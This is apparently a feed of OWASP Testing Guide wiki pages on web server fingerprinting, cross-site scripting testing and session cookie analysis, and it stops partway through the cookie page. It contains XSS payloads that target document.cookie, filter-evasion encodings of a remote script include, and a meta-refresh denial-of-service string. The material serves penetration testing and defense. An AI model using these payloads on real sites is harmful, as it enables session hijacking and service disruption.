HEAD / HTTP/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Date: Sun, 15 Jun 2003 17:10:49 GMT &lt;br /&gt;
Server: Apache/1.3.23 &lt;br /&gt;
Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT &lt;br /&gt;
ETag: 32417-c4-3e5d8a83 &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Content-Length: 196 &lt;br /&gt;
Connection: close &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''IIS 5.0''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc iis.example.com 80 &lt;br /&gt;
HEAD / HTTP/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Microsoft-IIS/5.0 &lt;br /&gt;
Content-Location: http://iis.example.com/Default.htm &lt;br /&gt;
Date: Fri, 01 Jan 1999 20:13:52 GMT &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Last-Modified: Fri, 01 Jan 1999 20:13:52 GMT &lt;br /&gt;
ETag: W/e0d362a4c335be1:ae1 &lt;br /&gt;
Content-Length: 133 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''Netscape Enterprise 4.1''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc netscape.example.com 80 &lt;br /&gt;
HEAD / HTTP/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Netscape-Enterprise/4.1 &lt;br /&gt;
Date: Mon, 16 Jun 2003 06:01:40 GMT &lt;br /&gt;
Content-type: text/HTML &lt;br /&gt;
Last-modified: Wed, 31 Jul 2002 15:37:56 GMT &lt;br /&gt;
Content-length: 57 &lt;br /&gt;
Accept-ranges: bytes &lt;br /&gt;
Connection: close &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notice that the ordering of the ''Date'' field and the ''Server'' field differs between Apache, Netscape Enterprise, and IIS.&lt;br /&gt;
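This ordering clue can be extracted programmatically; a minimal sketch, where the sample responses are abbreviated versions of the transcripts above:

```python
# Sketch: deriving the header-order clue from a raw HTTP response.
# Whether Server precedes Date (or vice versa) is one fingerprint hint.

def header_order(raw_response: str):
    """Return header names in the order they appear in the response."""
    names = []
    for line in raw_response.split("\r\n")[1:]:   # skip the status line
        if not line:
            break                                 # blank line ends the headers
        names.append(line.split(":", 1)[0])
    return names

APACHE = "HTTP/1.1 200 OK\r\nDate: Sun, 15 Jun 2003 17:10:49 GMT\r\nServer: Apache/1.3.23\r\n\r\n"
IIS = "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\nDate: Fri, 01 Jan 1999 20:13:52 GMT\r\n\r\n"
```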
&lt;br /&gt;
=== Malformed requests test === &lt;br /&gt;
Another useful test to execute involves sending malformed requests or requests of nonexistent pages to the server.&lt;br /&gt;
We consider the following HTTP response: &lt;br /&gt;
&lt;br /&gt;
Response from '''Apache 1.3.23'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc apache.example.com 80 &lt;br /&gt;
GET / HTTP/3.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 400 Bad Request &lt;br /&gt;
Date: Sun, 15 Jun 2003 17:12:37 GMT &lt;br /&gt;
Server: Apache/1.3.23 &lt;br /&gt;
Connection: close &lt;br /&gt;
Transfer-Encoding: chunked &lt;br /&gt;
Content-Type: text/HTML; charset=iso-8859-1 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''IIS 5.0''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc iis.example.com 80 &lt;br /&gt;
GET / HTTP/3.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Microsoft-IIS/5.0 &lt;br /&gt;
Content-Location: http://iis.example.com/Default.htm &lt;br /&gt;
Date: Fri, 01 Jan 1999 20:14:02 GMT &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Last-Modified: Fri, 01 Jan 1999 20:14:02 GMT &lt;br /&gt;
ETag: W/e0d362a4c335be1:ae1 &lt;br /&gt;
Content-Length: 133 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''Netscape Enterprise 4.1''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc netscape.example.com 80 &lt;br /&gt;
GET / HTTP/3.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 505 HTTP Version Not Supported &lt;br /&gt;
Server: Netscape-Enterprise/4.1 &lt;br /&gt;
Date: Mon, 16 Jun 2003 06:04:04 GMT &lt;br /&gt;
Content-length: 140 &lt;br /&gt;
Content-type: text/HTML &lt;br /&gt;
Connection: close &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We notice that every server answers in a different way. The answer also differs between versions of the same server. Analogous results are obtained if we create requests with a nonexistent protocol. Consider the following responses: &lt;br /&gt;
&lt;br /&gt;
Response from '''Apache 1.3.23''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc apache.example.com 80 &lt;br /&gt;
GET / JUNK/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Date: Sun, 15 Jun 2003 17:17:47 GMT &lt;br /&gt;
Server: Apache/1.3.23 &lt;br /&gt;
Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT &lt;br /&gt;
ETag: 32417-c4-3e5d8a83 &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Content-Length: 196 &lt;br /&gt;
Connection: close &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''IIS 5.0''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc iis.example.com 80 &lt;br /&gt;
GET / JUNK/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 400 Bad Request &lt;br /&gt;
Server: Microsoft-IIS/5.0 &lt;br /&gt;
Date: Fri, 01 Jan 1999 20:14:34 GMT &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
Content-Length: 87 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''Netscape Enterprise 4.1''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc netscape.example.com 80 &lt;br /&gt;
GET / JUNK/1.0 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;TITLE&amp;gt;Bad request&amp;lt;/TITLE&amp;gt;&amp;lt;/HEAD&amp;gt; &lt;br /&gt;
&amp;lt;BODY&amp;gt;&amp;lt;H1&amp;gt;Bad request&amp;lt;/H1&amp;gt; &lt;br /&gt;
Your browser sent a query this server could not understand. &lt;br /&gt;
&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Automated Testing == &lt;br /&gt;
Several such tests can be carried out. A tool that automates them is &amp;quot;''httprint''&amp;quot;, which allows one, through a signature dictionary, to recognize the type and the version of the web server in use.&amp;lt;br&amp;gt;&lt;br /&gt;
An example of the use of such a tool is shown below:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Image:httprint.jpg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Saumil Shah: &amp;quot;An Introduction to HTTP fingerprinting&amp;quot; - http://net-square.com/httprint/httprint_paper.html&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* httprint - http://net-square.com/httprint/index.shtml&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&amp;diff=14682</id>
		<title>Testing for Cross site scripting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&amp;diff=14682"/>
				<updated>2006-12-29T21:23:20Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
Cross Site Scripting is one of the most common application-level attacks. Cross Site Scripting is abbreviated XSS to avoid confusion with Cascading Style Sheets (CSS). Testing for XSS frequently results in a JavaScript alert window being displayed to the user, which may minimize the perceived importance of the finding. However, the alert window should be interpreted as a signal that an attacker has the ability to run arbitrary code.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
&lt;br /&gt;
XSS attacks are essentially code injection attacks against the various interpreters in the browser. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side languages. They can also be used for account hijacking, changing user settings, cookie theft/poisoning, and false advertising. In some cases, Cross Site Scripting vulnerabilities can even perform other functions, such as scanning for other vulnerabilities and performing a Denial of Service attack on your web server.&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties (the attacker and the web site, or the attacker and the victim client) the XSS attack involves three parties -- the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies or any other sensitive information which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site, impersonating the user - Identity theft!&lt;br /&gt;
&lt;br /&gt;
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the &amp;lt;Script&amp;gt; tag. Typically, XSS attacks involve malicious JavaScript, but they can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.&lt;br /&gt;
Cross Site Scripting is used in many Phishing attacks.&lt;br /&gt;
&lt;br /&gt;
Below, we provide more detailed information about the three types of Cross Site Scripting vulnerabilities: DOM-Based, Stored, and Reflected.&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://server/cgi-bin/testcgi.exe?&amp;lt;SCRIPT&amp;gt;alert(“Cookie”+document.cookie)&amp;lt;/SCRIPT&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.&lt;br /&gt;
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult.&lt;br /&gt;
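The probing step just described can be sketched as a simple reflection check: if the raw payload comes back in the response body unencoded, a browser would execute it. This is a minimal illustration, not a scanner; the payload and the sample response bodies are invented, and the angle brackets are written as Python hex escapes (\x3c, \x3e):&lt;br /&gt;

```python
# A hypothetical reflection check. "\x3c" and "\x3e" are simply the
# angle-bracket characters written as hex escapes.
PAYLOAD = "\x3cSCRIPT\x3ealert(document.cookie)\x3c/SCRIPT\x3e"

def is_reflected_unescaped(body, payload=PAYLOAD):
    """True if the raw payload appears verbatim in the response body,
    i.e. the browser would interpret it as executable script."""
    return payload in body

# An error page that echoes the request verbatim is vulnerable;
# one that HTML-encodes the input is not ("\x26lt;" spells the escaped form).
vulnerable_body = "Error: no handler for " + PAYLOAD
safe_body = "Error: no handler for \x26lt;SCRIPT\x26gt;alert(...)\x26lt;/SCRIPT\x26gt;"
```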
&lt;br /&gt;
'''Example 1:'''&lt;br /&gt;
&lt;br /&gt;
Since JavaScript is case sensitive, some people attempt to filter XSS by converting all characters to upper case, rendering the injected Cross Site Scripting payload inert. If this is the case, you may want to use VBScript instead, since it is not a case-sensitive language.&lt;br /&gt;
&lt;br /&gt;
JavaScript: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
VBScript: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script type=&amp;quot;text/vbscript&amp;quot;&amp;gt;alert(DOCUMENT.COOKIE)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Example 2:'''&lt;br /&gt;
&lt;br /&gt;
If the application filters the &amp;lt; character, or the opening &amp;lt;script or closing script&amp;gt; sequences, you should try various methods of encoding:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;script src=http://www.example.com/malicious-code.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
You can find more examples of XSS Injection here: http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&lt;br /&gt;
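As a sketch, the encoded variants shown above can be generated mechanically; the helper names below are invented for illustration, and the angle brackets are again written as hex escapes:&lt;br /&gt;

```python
# Hypothetical helpers that produce the URL-encoded and hex-escaped
# variants of a payload; "\x3c"/"\x3e" are the angle-bracket characters.
def url_encode_angles(s):
    return s.replace("\x3c", "%3c").replace("\x3e", "%3e")

def hex_escape_angles(s):
    return s.replace("\x3c", "\\x3c").replace("\x3e", "\\x3e")

payload = "\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e"
```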
&lt;br /&gt;
Three types of Cross Site Scripting tests are explained below: DOM-Based, Stored, and Reflected.&lt;br /&gt;
&lt;br /&gt;
The '''DOM-based Cross-Site Scripting''' problem exists within a page's client-side script itself. If the JavaScript accesses a URL request parameter (an example would be an RSS feed) and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS vulnerability will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side script.&lt;br /&gt;
Exploiting such a hole would be very similar to the exploitation of Reflected XSS vulnerabilities, except in one very important situation. &lt;br /&gt;
&lt;br /&gt;
For example, if an attacker hosts a malicious website which contains a link to a vulnerable page on a client's local system, a script could be injected and would run with privileges of that user's browser on their system. This bypasses the entire client-side sandbox, not just the cross-domain restrictions that are normally bypassed with XSS exploits.&lt;br /&gt;
&lt;br /&gt;
The '''Reflected Cross-Site Scripting''' vulnerability is by far the most common and well-known type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.&lt;br /&gt;
&lt;br /&gt;
At first glance, this does not appear to be a serious problem, since users can only inject code into their own pages. However, with a small amount of social engineering, an attacker could convince a user to follow a malicious URL which injects code into the results page, giving the attacker full access to that page's content. Because some social engineering is generally required in this case (and normally in DOM-Based XSS vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS), and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities. The simplest way to demonstrate the importance of an XSS vulnerability is to perform a Denial of Service attack.&lt;br /&gt;
In some cases a Denial of Service attack can be performed on the server by doing the following:      &lt;br /&gt;
&lt;br /&gt;
 article.php?title=&amp;lt;meta%20http-equiv=&amp;quot;refresh&amp;quot;%20content=&amp;quot;0;&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This makes a refresh request to a particular page roughly every 0.3 seconds. It then acts like an infinite loop of refresh requests, potentially bringing down the web and database servers by flooding them with requests. The more browser sessions that are open, the more intense the attack becomes.&lt;br /&gt;
&lt;br /&gt;
The '''Stored Cross Site Scripting''' vulnerability is the most powerful kind of XSS attack. A Stored XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities. A real-life example of this is SAMY, the XSS vulnerability found on MySpace in October 2005.&lt;br /&gt;
These vulnerabilities are more significant than other types because an attacker can inject the script just once. This could potentially hit a large number of other users with little need for social engineering, or the web application could even be infected by a cross-site scripting virus.&lt;br /&gt;
&lt;br /&gt;
'''Example'''&lt;br /&gt;
&lt;br /&gt;
Suppose we have a site that permits us to leave a message for other users (a lesson from WebGoat v3.7), and we inject a script instead of a message in the following way:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:XSSStored1.PNG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The server will store this information, and when a user clicks on our fake message, his browser will execute our script, as follows:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:XSSStored2.PNG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The methods of injection can vary a great deal. A perfect example of how this type of attack could impact an organization, instead of an individual, was demonstrated by Jeremiah Grossman at BlackHat USA 2006. The demonstration showed how posting a stored XSS script to a popular blog, newspaper, or page-comments section of a website can cause all the visitors of that page to have their internal networks scanned and logged for a particular type of vulnerability.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Paul Lindner: &amp;quot;Preventing Cross-site Scripting Attacks&amp;quot; - http://www.perl.com/pub/a/2002/02/20/css.html&lt;br /&gt;
&lt;br /&gt;
* CERT: &amp;quot;CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests&amp;quot; - http://www.cert.org/advisories/CA-2000-02.html&lt;br /&gt;
&lt;br /&gt;
* RSnake: &amp;quot;XSS (Cross Site Scripting) Cheat Sheet&amp;quot; - http://ha.ckers.org/xss.html&lt;br /&gt;
&lt;br /&gt;
* Amit Klein: &amp;quot;DOM Based Cross Site Scripting&amp;quot; - http://www.securiteam.com/securityreviews/5MP080KGKW.html&lt;br /&gt;
&lt;br /&gt;
* Jeremiah Grossman: &amp;quot;Hacking Intranet Websites from the Outside &amp;quot;JavaScript malware just got a lot more dangerous&amp;quot;&amp;quot; - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project&lt;br /&gt;
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Cookie_and_Session_Token_Manipulation&amp;diff=14681</id>
		<title>Testing for Cookie and Session Token Manipulation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Cookie_and_Session_Token_Manipulation&amp;diff=14681"/>
				<updated>2006-12-29T20:40:28Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
In this test we want to check that cookies and other session tokens are created in a secure and unpredictable way. An attacker that is able to predict and forge a weak cookie can easily hijack sessions of legitimate users.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Cookies are used to implement session management and are described in detail in RFC 2965. In a nutshell, when a user accesses an application which needs to keep track of the actions and identity of that user across multiple requests, a cookie (or more than one) is generated by the server and sent to the client. The client will then send the cookie back to the server in all subsequent connections, until the cookie expires or is destroyed. The data stored in the cookie can provide the server with a large spectrum of information about who the user is, what actions he has performed so far, what his preferences are, etc., thereby providing state to a stateless protocol like HTTP.&lt;br /&gt;
&lt;br /&gt;
A typical example is provided by an online shopping cart. Throughout the session of a user, the application must keep track of his identity, his profile, the products that he has chosen to buy, the quantity, the individual prices, the discounts, etc. Cookies are an efficient way to store and pass this information back and forth (other methods are URL parameters and hidden fields).&lt;br /&gt;
&lt;br /&gt;
Due to the importance of the data that they store, cookies are therefore vital to the overall security of the application. Being able to tamper with cookies may result in hijacking the sessions of legitimate users, gaining higher privileges in an active session, and in general influencing the operations of the application in an unauthorized way. In this test we have to check whether the cookies issued to clients can resist a wide range of attacks aimed at interfering with the sessions of legitimate users and with the application itself. The overall goal is to be able to forge a cookie that will be considered valid by the application and that will provide some kind of unauthorized access (session hijacking, privilege escalation, ...). Usually the main steps of the attack pattern are the following:&lt;br /&gt;
* '''cookie collection''': collection of a sufficient number of cookie samples;&lt;br /&gt;
* '''cookie reverse engineering''': analysis of the cookie generation algorithm;&lt;br /&gt;
* '''cookie manipulation''': forging of a valid cookie in order to perform the attack. This last step might require a large number of attempts, depending on how the cookie is created (cookie brute-force attack).&lt;br /&gt;
&lt;br /&gt;
Another pattern of attack consists of overflowing a cookie. Strictly speaking, this attack has a different nature, since here we are not trying to recreate a perfectly valid cookie. Instead, our goal is to overflow a memory area, thereby interfering with the correct behavior of the application and possibly injecting (and remotely executing) malicious code.&lt;br /&gt;
&lt;br /&gt;
==Black Box Testing and Examples==&lt;br /&gt;
&lt;br /&gt;
All interaction between the Client and Application should be tested at least against the following criteria:&lt;br /&gt;
* Are all Set-Cookie directives tagged as Secure?	&lt;br /&gt;
* Do any Cookie operations take place over unencrypted transport?	&lt;br /&gt;
* Can the Cookie be forced over unencrypted transport?  	&lt;br /&gt;
* If so, how does the application maintain security?	&lt;br /&gt;
* Are any Cookies persistent?	&lt;br /&gt;
* What Expires= times are used on persistent cookies, and are they reasonable?	&lt;br /&gt;
* Are cookies that are expected to be transient configured as such?	&lt;br /&gt;
* What HTTP/1.1 Cache-Control settings are used to protect Cookies?	&lt;br /&gt;
* What HTTP/1.0 Cache-Control settings are used to protect Cookies?	&lt;br /&gt;
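Part of this checklist can be automated. The sketch below (a deliberately naive parser, not a full cookie-header implementation; the function name is ours) flags two of the criteria from a raw Set-Cookie value:&lt;br /&gt;

```python
def audit_set_cookie(header):
    """Naively split a Set-Cookie value into attributes and flag
    whether it is marked Secure and whether it is persistent."""
    parts = [p.strip().lower() for p in header.split(";")]
    attrs = parts[1:]  # parts[0] is the name=value pair
    persistent = any(a.startswith("expires=") or a.startswith("max-age=")
                     for a in attrs)
    return {"secure": "secure" in attrs, "persistent": persistent}
```

A session cookie lacking both Expires and Max-Age is transient; anything else should be checked against the "reasonable expiration" criterion above.&lt;br /&gt;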
&lt;br /&gt;
'''Cookie collection'''&lt;br /&gt;
&lt;br /&gt;
The first step required in order to manipulate the cookie is obviously to understand how the application creates and manages cookies. For this task, we have to try to answer the following questions:&lt;br /&gt;
&lt;br /&gt;
* How many cookies are used by the application?&lt;br /&gt;
Surf the application. Note when cookies are created. Make a list of received cookies, the page that sets them (with the set-cookie directive), the domain for which they are valid, their value, and their characteristics.&lt;br /&gt;
* Which parts of the application generate and/or modify the cookie?&lt;br /&gt;
While surfing the application, find which cookies remain constant and which get modified. What events modify the cookie?&lt;br /&gt;
* Which parts of the application require this cookie in order to be accessed and utilized?&lt;br /&gt;
Find out which parts of the application need a cookie. Access a page, then try again without the cookie, or with a modified value of it. Try to map which cookies are used where.&lt;br /&gt;
&lt;br /&gt;
A spreadsheet mapping each cookie to the corresponding application parts and the related information can be a valuable output of this phase.&lt;br /&gt;
&lt;br /&gt;
'''Cookie reverse engineering'''&lt;br /&gt;
----&lt;br /&gt;
Now that we have enumerated the cookies and have a general idea of their use, it is time to have a deeper look at cookies that seem interesting. Which cookies are we interested in? A cookie, in order to provide a secure method of session management, must combine several characteristics, each of which is aimed at protecting the cookie from a different class of attacks. These characteristics are summarized below:&lt;br /&gt;
#Unpredictability: a cookie must contain some amount of hard-to-guess data. The harder it is to forge a valid cookie, the harder it is to break into a legitimate user's session. If an attacker can guess the cookie used in an active session of a legitimate user, he/she will be able to fully impersonate that user (session hijacking). In order to make a cookie unpredictable, random values and/or cryptography can be used.&lt;br /&gt;
#Tamper resistance: a cookie must resist malicious modification attempts. If we receive a cookie like IsAdmin=No, it is trivial to modify it to obtain administrative rights, unless the application performs a double check (for instance, appending to the cookie an encrypted hash of its value).&lt;br /&gt;
#Expiration: a critical cookie must be valid only for an appropriate period of time and must be deleted from disk/memory afterwards in order to avoid the risk of being replayed. This does not apply to cookies that store non-critical data that needs to be remembered across sessions (e.g.: site look-and-feel)&lt;br /&gt;
#“Secure” flag: a cookie whose value is critical for the integrity of the session should have this flag enabled in order to allow its transmission only in an encrypted channel to deter eavesdropping.&lt;br /&gt;
&lt;br /&gt;
The approach here is to collect a sufficient number of instances of a cookie and start looking for patterns in their value. The exact meaning of “sufficient” can vary from a handful of samples if the cookie generation method is very easy to break to several thousands if we need to proceed with some mathematical analysis (e.g.: chi-squares, attractors, ..., see later).&lt;br /&gt;
&lt;br /&gt;
It is important to pay particular attention to the workflow of the application, as the state of a session can have a heavy impact on the collected cookies: a cookie collected before authentication can be very different from a cookie obtained after authentication.&lt;br /&gt;
&lt;br /&gt;
Another aspect to take into consideration is time: always record the exact time when a cookie has been obtained, since time may play a role in the value of the cookie (the server could use a timestamp as part of the cookie value). The time recorded could be the local time or the server's timestamp included in the HTTP response (or both).&lt;br /&gt;
&lt;br /&gt;
Analyzing the collected values, try to figure out all the variables that could have influenced the cookie value, and try to vary them one at a time. Passing modified versions of the same cookie to the server can be very helpful in understanding how the application reads and processes the cookie.&lt;br /&gt;
&lt;br /&gt;
Examples of checks to be performed at this stage include:&lt;br /&gt;
* What character set is used in the cookie? Is the cookie value numeric? Alphanumeric? Hexadecimal? What happens if we insert characters that do not belong to the expected charset?&lt;br /&gt;
* Is the cookie composed of different sub-parts carrying different pieces of information? How are the different parts separated? With which delimiters? Some parts of the cookie could have a higher variance, others might be constant, and others could assume only a limited set of values. Breaking down the cookie into its base components is the first and fundamental step. An example of an easy-to-spot structured cookie is the following:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ID=5a0acfc7ffeb919:CR=1:TM=1120514521:LM=1120514521:S=j3am5KzC4v01ba3q&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this example we see 5 different fields, carrying different types of data:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ID – hexadecimal&lt;br /&gt;
CR – small integer&lt;br /&gt;
TM and LM – large integer (curiously, they hold the same value; it is worth seeing what happens if one of them is modified)&lt;br /&gt;
S – alphanumeric&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Even when no delimiters are used, having enough samples can help. As an example, let's look at the following series:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
0123456789abcdef&lt;br /&gt;
================&lt;br /&gt;
1 323a4f2cc76532gj&lt;br /&gt;
2 95fd7710f7263hd8&lt;br /&gt;
3 7211b3356782687m&lt;br /&gt;
4 31bbf9ee87966bbs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We have no separators here, but the different parts start to show up. We seem to have a 2-digit decimal number (columns #0 and #1), a 7-digit hexadecimal number (#2-#8), a constant “7” (#9), a 3-digit decimal number (#a-#c), and a 3-character string (#d-#f). However, some open questions remain: the first column is always odd, so it may be a value of its own in which the least significant bit is always 1; or maybe the first 9 columns are just one hexadecimal value. Collecting a few more samples will quickly answer these questions.&lt;br /&gt;
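This column-by-column reasoning is easy to script. A minimal sketch over the four sample values (the helper name is ours):&lt;br /&gt;

```python
# Collect, for each character position, the set of values observed
# across the samples; constant columns and per-column charsets stand out.
samples = [
    "323a4f2cc76532gj",
    "95fd7710f7263hd8",
    "7211b3356782687m",
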